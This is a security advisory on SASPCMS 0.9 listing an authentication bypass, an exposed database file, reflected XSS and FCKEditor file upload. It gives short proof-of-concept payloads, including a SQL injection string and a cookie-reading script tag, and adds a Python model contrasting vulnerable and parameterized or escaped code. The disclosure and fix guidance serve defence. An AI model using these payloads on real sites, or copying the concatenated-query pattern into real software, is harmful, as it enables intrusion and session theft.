SASPCMS Multiple Vulnerabilities

2009-04-10T00:00:00
ID SECURITYVULNS:DOC:21608
Type securityvulns
Reporter Securityvulns
Modified 2009-04-10T00:00:00

Description

www.BugReport.ir

AmnPardaz Security Research Team

Title: SASPCMS Multiple Vulnerabilities

Vendor: http://www.lgasoft.com

Vulnerable Version: 0.9 (prior versions also may be affected)

Exploitation: Remote with browser

Fix: N/A

  • Description:

SASPCMS is an ASP Content Management System which uses MSSQL and
Microsoft Access as backend databases.

  • Vulnerability:

+-->Authentication Bypass

POC: ' or ''=' http://[URL]/saspcms/admin/default.asp

+-->Database Information Disclosure

POC: http://[URL]/saspcms/db/menu.mdb

+-->Cross Site Scripting (XSS). Reflected XSS in the "q" parameter of
"default.asp".

POC:
http://[URL]/saspcms/default.asp?q=<script>alert(document.cookie)</script>

  • PoC:

It's possible for remote attackers to upload arbitrary files by using
FCKEditor after logging in to the admin area.

http://www.bugreport.ir/64/exploit.htm

  • Solution:

Edit the source code to ensure that inputs are properly sanitized.
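
The fix described above, shown as an added example that is not part of the original advisory and is not SASPCMS code: a Python/SQLite model of the two input-handling patterns, run against the advisory's own PoC strings. The table layout, function names and sample credentials are hypothetical and constructed for illustration.

```python
import html
import sqlite3

# The two PoC strings quoted in the advisory above.
SQLI_POC = "' or ''='"
XSS_POC = "<script>alert(document.cookie)</script>"


def make_db():
    """Constructed in-memory stand-in for a CMS user table (hypothetical schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Plaintext password only to keep the model short; real code stores a salted hash.
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return db


def login_concatenated(db, username, password):
    """Vulnerable pattern: input is pasted into the SQL text, so quotes change the query."""
    sql = ("SELECT COUNT(*) FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone()[0] > 0


def login_parameterized(db, username, password):
    """Hardened pattern: values are bound as data and never parsed as SQL."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone()[0] > 0


def render_search_raw(q):
    """Vulnerable pattern: the q parameter is echoed into HTML unchanged."""
    return "<p>Results for: " + q + "</p>"


def render_search_encoded(q):
    """Hardened pattern: HTML-encode q on output so markup is shown as text."""
    return "<p>Results for: " + html.escape(q, quote=True) + "</p>"


if __name__ == "__main__":
    db = make_db()
    print("concatenated login accepts PoC: ", login_concatenated(db, SQLI_POC, SQLI_POC))
    print("parameterized login accepts PoC:", login_parameterized(db, SQLI_POC, SQLI_POC))
    print(render_search_encoded(XSS_POC))
```

In Classic ASP the corresponding controls are ADODB.Command parameters for the query and Server.HTMLEncode for the echoed "q" value.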

  • Credit:

AmnPardaz Security Research & Penetration Testing Group

Contact: admin[4t}bugreport{d0t]ir

www.BugReport.ir

www.AmnPardaz.com